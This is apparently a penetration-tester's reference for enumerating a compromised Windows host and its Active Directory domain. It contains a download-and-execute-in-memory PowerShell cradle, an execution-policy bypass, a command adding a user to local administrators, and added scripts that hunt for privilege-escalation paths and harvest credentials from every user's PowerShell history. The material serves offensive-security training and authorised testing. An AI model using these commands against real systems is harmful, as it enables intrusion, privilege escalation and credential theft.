
Information gathering

Host


hostname

System Information


sysinfo - [cmd / powershell]

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
System - [powershell]
[System.Environment]::OSVersion.Version 
path - [powershell]
$env:path
windows defender - [cmd] (sc = service control; shows whether the Defender service is running)
sc query windefend
Displays the domain name to which the host belongs (ran from CMD-prompt; "set %USERDOMAIN%" expands the variable first and does not print it)
echo %USERDOMAIN%
Prints out the name of the domain controller the host checks in with (ran from CMD-prompt)
echo %LOGONSERVER%

User and groups


local

my user

whoami
whoami /priv
whoami /groups
user - [cmd]
net user
net user <user-name>
user - [powershell]
get-localuser
get-localuser -name <user-name> | select *
get-localuser -name <user-name> | select Name,Enabled,LastLogon
group - [cmd]
net localgroup
net localgroup <group-name>
group - [powershell]
get-localGroup | Select *
get-localGroup | ft Name
users that belong to a group - [cmd]
net localgroup <group-name>
users that belong to a group - [powershell]
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
permissions (Sysinternals accesschk: -u suppress errors, -w write access only, -d directories only, -q no banner; no trailing backslash before the closing quote, cmd would read it as an escaped quote)
.\accesschk.exe -uwdq "C:\Program Files\Unquoted Path Service"

Scheduled tasks (the Windows equivalent of cron)


scheduled tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /v "\Microsoft"

Process


list of processes that are mapped to a specific Windows service

tasklist /SVC
Get-Process

Service


show all running services on the machine [cmd] (note the space after "type="; add "state= all" to include stopped services)

sc queryex type= service
show services [cmd] (wmic is deprecated and missing on current Windows 11 builds; the PowerShell forms below are the replacement)
wmic service
wmic service get name,startname
wmic service get name,pathname

[powershell]

Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName
Get-WmiObject win32_service | select Name, DisplayName, PathName
Get-WmiObject win32_service | select Name, PathName
[powershell]
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartMode | Where-Object {$_.State -like 'Running'}

Network


Prints out adapter settings for the host (ifconfig is the Linux tool; it does not exist on Windows).

ipconfig
ipconfig /all
Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
route print
Active network connections (-n numeric addresses, -a listening sockets too, -o owning PID to match against tasklist, -r routing table)
netstat -n
netstat -r
netstat -ano
Lists all known hosts stored in the arp table.
arp -a
Test connection
Test-NetConnection -ComputerName 127.0.0.1 -Port 80

Firewall


Displays the status of the host's firewall. We can determine if it is active and filtering traffic.

netsh advfirewall show state
firewall - netsh [cmd / powershell]
netsh advfirewall firewall dump
netsh advfirewall firewall show rule name=all
netsh advfirewall show currentprofile
netsh advfirewall show allprofiles

legacy "netsh firewall" context (deprecated since Vista / Server 2008, still present on old hosts)
netsh firewall show state
netsh firewall show config
windows defender service - [cmd] (not the firewall)
sc query windefend
firewall - [powershell]
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | select DisplayName, Enabled, Description
Get-NetFirewallRule -DisplayName <rule-display-name> | select *
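Get-NetFirewallRule alone does not say which ports a rule opens; the port, address and program live in separate filter objects. The script below is an added example (not part of the original page) that joins them, so the output answers "what can actually be reached from the network". It assumes the NetSecurity module (Windows 8 / Server 2012 and later); the function names are this example's own.

```powershell
# Added example, not from the original page. Resolves enabled inbound Allow rules
# to the port, remote address and program filters that make them effective.

function Get-ProfileState {
    # A rule only matters on a profile that is enabled; Get-NetConnectionProfile
    # tells you which profile the current network is classified as.
    Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction
}

function Get-InboundAllowRule {
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue |
    ForEach-Object {
        $rule = $_
        # Each filter cmdlet accepts the rule on the pipeline and returns its filter.
        $port = $rule | Get-NetFirewallPortFilter
        $addr = $rule | Get-NetFirewallAddressFilter
        $app  = $rule | Get-NetFirewallApplicationFilter
        [pscustomobject]@{
            Rule          = $rule.DisplayName
            Profile       = $rule.Profile
            Protocol      = $port.Protocol
            LocalPort     = ($port.LocalPort -join ',')
            RemoteAddress = ($addr.RemoteAddress -join ',')
            Program       = $app.Program
        }
    }
}

Get-ProfileState | Format-Table -AutoSize

# Rules open to any remote address on a specific port are the ones that matter
# for lateral movement; "Any" in LocalPort means the rule is program-scoped instead.
Get-InboundAllowRule |
    Where-Object { $_.RemoteAddress -eq 'Any' -and $_.LocalPort -ne 'Any' } |
    Sort-Object Protocol, LocalPort |
    Format-Table -AutoSize
```

Reading rules requires no elevation, so this runs from the first shell you land in; compare the result with `netstat -ano` to see which open ports also have a listener behind them.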

Installed Applications


application - [cmd] (Win32_Product only lists MSI-installed software and makes Windows Installer re-validate every package while it runs: slow, and it writes MsiInstaller events to the Application log)

wmic product get name, version, vendor
updates - [cmd]
wmic qfe get Caption, Description, HotFixID, InstalledOn
windows antivirus (the SecurityCenter2 namespace exists on client editions only, not on Windows Server)
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
antimalware
Get-MpComputerStatus
windows defender
Get-Service WinDefend
Get-MpThreat
Get-MpComputerStatus | select RealTimeProtectionEnabled

Readable/Writable Files and Directories


accesschk.exe -uws "Everyone" "C:\Program Files"
  • -u suppress errors
  • -w search for write access permissions
  • -s perform a recursive search
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
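The accesschk and Get-Acl one-liners above answer "who can write here" for a single identity such as Everyone; the service and scheduled-task listings earlier in the page only print paths. The script below is an added example (not part of the original page) that ties the two together: it collects the SIDs of the current token, tests a path's ACL against them, and applies that test to the unquoted service paths from the Service section and to the non-Microsoft scheduled-task actions from the scheduled-task section. It assumes Windows PowerShell 5.1 or later and that it runs as the low-privileged user whose access you want to measure; the function names are this example's own.

```powershell
# Added example, not from the original page. Run as the low-privileged user
# whose access is being tested.

# SIDs carried by the current token: the user plus every group it belongs to.
$TokenSids = @([System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value) +
             @([System.Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object Value)

function Test-PathWritable {
    # True if an Allow ACE for one of our SIDs grants WriteData/CreateFiles (0x2),
    # GENERIC_WRITE (0x40000000) or GENERIC_ALL (0x10000000). Deny ACEs are not
    # evaluated, so a hit means "verify by hand", not proof.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($rule in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($TokenSids -notcontains $rule.IdentityReference.Value) { continue }
        $mask = [int]$rule.FileSystemRights
        if (($mask -band 0x2) -or ($mask -band 0x40000000) -or ($mask -band 0x10000000)) { return $true }
    }
    return $false
}

function Find-UnquotedServicePath {
    # An unquoted ImagePath with spaces makes the SCM try C:\Program.exe, then
    # C:\Program Files\Foo.exe, ... before the real binary. Each candidate's
    # parent directory is what an attacker would need to write to.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName -or $svc.PathName.StartsWith('"')) { return }
        # Binary = everything up to the first ".exe"; the remainder is arguments.
        $exe = if ($svc.PathName -match '^(?<bin>.+?\.exe)') { $Matches.bin } else { $svc.PathName }
        if ($exe -notmatch ' ') { return }
        $parts = $exe.Split(' ')
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                Candidate   = $candidate
                DirWritable = Test-PathWritable (Split-Path -Parent $candidate)
            }
        }
    }
}

function Find-WritableTaskAction {
    # Tasks outside \Microsoft\ whose executable (or its directory) we can write to,
    # with the account they run as; SYSTEM or a Highest-RunLevel admin is the prize.
    Get-ScheduledTask |
    Where-Object { $_.TaskPath -notlike '\Microsoft\*' -and $_.State -ne 'Disabled' } |
    ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }                    # COM-handler actions have no path
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            if (-not [System.IO.Path]::IsPathRooted($exe)) { continue } # bare "cmd.exe" resolves via PATH
            [pscustomobject]@{
                Task        = $task.TaskPath + $task.TaskName
                RunsAs      = $task.Principal.UserId
                RunLevel    = $task.Principal.RunLevel
                Executable  = $exe
                ExeWritable = Test-PathWritable $exe
                DirWritable = Test-PathWritable (Split-Path -Parent $exe)
            }
        }
    }
}

Find-UnquotedServicePath | Where-Object DirWritable | Format-Table -AutoSize
Find-WritableTaskAction  | Where-Object { $_.ExeWritable -or $_.DirWritable } | Format-Table -AutoSize
```

A writable candidate directory is only useful if the service also runs as a more privileged account (RunsAs) and you can restart it or wait for a reboot; confirm a hit by actually creating a file there, since inherited Deny entries are not modelled above.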

Disks


enumerate all disks

mountvol
wmic logicaldisk get caption,description,providername

Device Drivers and Kernel Modules


Enumerate drivers (property names that contain spaces must be quoted for Select-Object)

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
get details
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Binaries That AutoElevate


If the AlwaysInstallElevated value is set to 1 under both HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE, any user can install a Windows Installer (.msi) package with SYSTEM privileges. Both keys must be checked: the setting only takes effect when it is enabled in both hives.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Directory permissions


get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-Table -wrap
get-acl -path "C:\Program Files\Unquoted Path Service\" | Format-List
List of files
dir
ls
ls -force
Get-ChildItem
gci

Shares


net view \\dc01 /all
net share

Logs and Events


get-eventlog -list (classic cmdlet; in PowerShell 7 it is gone and Get-WinEvent replaces it)

Harnessing PowerShell


Lists available modules loaded for use.

Get-Module

Will print the execution policy settings for each scope on a host.

Get-ExecutionPolicy -List

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Set-ExecutionPolicy Bypass -Scope Process

With this command, we can read the specified user's PowerShell history (PSReadLine stores it per user). This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt 
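Reading one history file is fine for a single user; on a shared host you want every profile at once, with the interesting lines picked out. The script below is an added example (not part of the original page) that walks C:\Users, reads each PSReadLine history, and reports the lines matching a keyword list. The keyword list is this example's own choice; reading other users' profiles requires local admin, and newer PSReadLine releases skip saving commands that contain words such as password or token, so an empty result does not prove the history was never sensitive.

```powershell
# Added example, not from the original page. Sweeps every user profile's
# PSReadLine history for credential-looking command lines.

$HistoryRelPath = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

# Words that commonly sit next to a secret on a command line (this example's list).
$Keywords = @('password', 'passwd', 'pwd', 'secret', 'token', 'apikey', 'api_key',
              'ConvertTo-SecureString', '-Credential', 'net use', 'cmdkey', 'runas')

function Get-HistorySecrets {
    param(
        [string]$UsersRoot = 'C:\Users',
        [string[]]$Words = $Keywords
    )
    # One case-insensitive alternation; escape so "-Credential" and "api_key" stay literal.
    $re = ($Words | ForEach-Object { [regex]::Escape($_) }) -join '|'
    foreach ($userDir in Get-ChildItem -LiteralPath $UsersRoot -Directory -ErrorAction SilentlyContinue) {
        $hist = Join-Path $userDir.FullName $HistoryRelPath
        if (-not (Test-Path -LiteralPath $hist)) { continue }
        $n = 0
        foreach ($line in Get-Content -LiteralPath $hist -ErrorAction SilentlyContinue) {
            $n++
            if ($line -match $re) {
                [pscustomobject]@{ User = $userDir.Name; LineNo = $n; Command = $line }
            }
        }
    }
}

Get-HistorySecrets | Format-Table -AutoSize -Wrap
```

For the current user the exact file location can be confirmed with `(Get-PSReadLineOption).HistorySavePath`, which matters when a profile has been relocated or the host runs PowerShell 7 alongside Windows PowerShell.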

Return environment values such as key paths, users, computer information, etc.

Get-ChildItem Env: | ft Key,Value

Download a file from the web using PowerShell and call it from memory.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

Am I Alone?


qwinsta

Windows Management Instrumentation (WMI)


Prints the patch level and description of the Hotfixes applied

wmic qfe get Caption,Description,HotFixID,InstalledOn   

Displays basic host information to include any attributes within the list

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List  

A listing of all processes on host

wmic process list /format:list  

Displays information about the Domain and Domain Controllers

wmic ntdomain list /format:list 

Displays information about all local accounts and any domain accounts that have logged into the device

wmic useraccount list /format:list  

Information about all local groups

wmic group list /format:list

Dumps information about any system accounts that are being used as service accounts.

wmic sysaccount list /format:list

Host Enumeration
OS
wmic computersystem LIST full
Anti-Virus
wmic /namespace:\\root\securitycenter2 path antivirusproduct
Peripherals
wmic path Win32_PnPdevice
Installed Updates
wmic qfe list brief
Directory Listing and File Search
wmic DATAFILE where "path='\\Users\\test\\Documents\\'" GET Name,readable,size

wmic DATAFILE where "drive='C:' AND Name like '%password%'" GET Name,readable,size /VALUE
Local User Accounts
wmic USERACCOUNT Get Domain,Name,Sid

Domain Enumeration
Domain and DC Info

wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
Domain User Info (GET with no attribute list returns every property)
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='testAccount'" GET
List All Users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname
List All Groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname
Members of A Group
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value

wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"YOURDOMAINHERE\"")
List All Computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

OR

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname

Execute a Command (runs locally; add /node:<host> before "process" to run it on a remote host, as in the RDP example below)

wmic process call create "cmd.exe /c calc.exe"

Enable Remote Desktop

wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"

OR

wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Net Commands


Information about password requirements

net accounts

Password and lockout policy

net accounts /domain

Information about domain groups

net group /domain

List of users with domain admin privileges

net group "Domain Admins" /domain

List of computer accounts joined to the domain

net group "domain computers" /domain

List of the computer accounts of the domain controllers

net group "Domain Controllers" /domain

User that belongs to the group

net group <domain_group_name> /domain

List of domain groups

net groups /domain

All available groups

net localgroup

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup administrators /domain

Information about a group (admins)

net localgroup Administrators

Add user to administrators

net localgroup administrators [username] /add

Check current shares

net share

Get information about a user within the domain

net user <ACCOUNT_NAME> /domain

List of all users of the domain

net user /domain

Information about the current user

net user %username%

Mount the share locally (UNC path, two leading backslashes)

net use x: \\computer\share

Get a list of computers

net view

Shares on the domains

net view /all /domain[:domainname]

List shares of a computer

net view \\computer /ALL

List of PCs of the domain

net view /domain

Dsquery


Dsquery is a helpful command-line tool that can be utilized to find Active Directory objects.

User Search

dsquery user

Computer Search

dsquery computer

We can use a dsquery wildcard search to view all objects in an OU.

dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Users With Specific Attributes Set (PASSWD_NOTREQD). 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule: the filter matches objects whose userAccountControl has every bit of the given value set (32 = PASSWD_NOTREQD).

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

Searching for Domain Controllers (8192 = SERVER_TRUST_ACCOUNT, set only on DC computer accounts)

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
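dsquery is not always present on a workstation, but the same bitwise-AND matching rule works from any domain-joined host through the [adsisearcher] type accelerator. The script below is an added example (not part of the original page) that generalises the two filters above to any userAccountControl flag and decodes the flags it finds. It runs as the current domain user with no RSAT installed; the flag table holds the standard AD values, and the function name is this example's own.

```powershell
# Added example, not from the original page. Same LDAP matching rule as the
# dsquery filters (1.2.840.113556.1.4.803 = bitwise AND), via DirectorySearcher.

# userAccountControl flag bits (standard AD values).
$UF = @{
    ACCOUNTDISABLE         = 0x2
    PASSWD_NOTREQD         = 0x20      # 32, the dsquery example above
    SERVER_TRUST_ACCOUNT   = 0x2000    # 8192, set on domain controllers
    DONT_EXPIRE_PASSWORD   = 0x10000
    TRUSTED_FOR_DELEGATION = 0x80000
}

function Find-AdObjectWithUacFlag {
    param(
        [Parameter(Mandatory)][int]$Flag,
        [string]$ObjectCategory = 'person',   # 'computer' for machine accounts
        [int]$Limit = 0                       # 0 = unlimited (dsquery stops at 100 by default)
    )
    $filter = "(&(objectCategory=$ObjectCategory)(userAccountControl:1.2.840.113556.1.4.803:=$Flag))"
    $searcher = [adsisearcher]$filter          # binds to the current user's domain
    $searcher.PageSize  = 500                  # page so large domains are not truncated
    $searcher.SizeLimit = $Limit
    $null = $searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'userAccountControl', 'distinguishedName'))
    foreach ($r in $searcher.FindAll()) {
        $uac = [int]$r.Properties['useraccountcontrol'][0]
        [pscustomobject]@{
            Name  = [string]$r.Properties['samaccountname'][0]
            UAC   = $uac
            # Decode every known bit present in the value, not just the one searched for.
            Flags = ($UF.GetEnumerator() | Where-Object { $uac -band $_.Value } | ForEach-Object Key | Sort-Object) -join ','
            DN    = [string]$r.Properties['distinguishedname'][0]
        }
    }
}

# Users that do not require a password (dsquery :=32 example).
Find-AdObjectWithUacFlag -Flag $UF.PASSWD_NOTREQD | Format-Table Name, Flags, DN -AutoSize
# Domain controllers (dsquery :=8192 example).
Find-AdObjectWithUacFlag -Flag $UF.SERVER_TRUST_ACCOUNT -ObjectCategory computer | Format-Table Name, DN -AutoSize
```

Because the matching rule tests that all bits of the supplied value are set, passing an OR of two flags finds accounts that carry both, which is handy for narrowing (for example PASSWD_NOTREQD without ACCOUNTDISABLE has to be filtered client-side from the Flags column, since there is no bitwise-NOT rule).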

Automated Enumeration


executable

powerShell

windows-exploit-suggester

  • windows-exploit-suggester
  • /opt/windows/windows-exploit-suggester systeminfo.out -i "Elevation of Privilege" -e > exploits.txt

windows-privesc-check2.exe

metasploit

msf> run post/multi/recon/local_exploit_suggester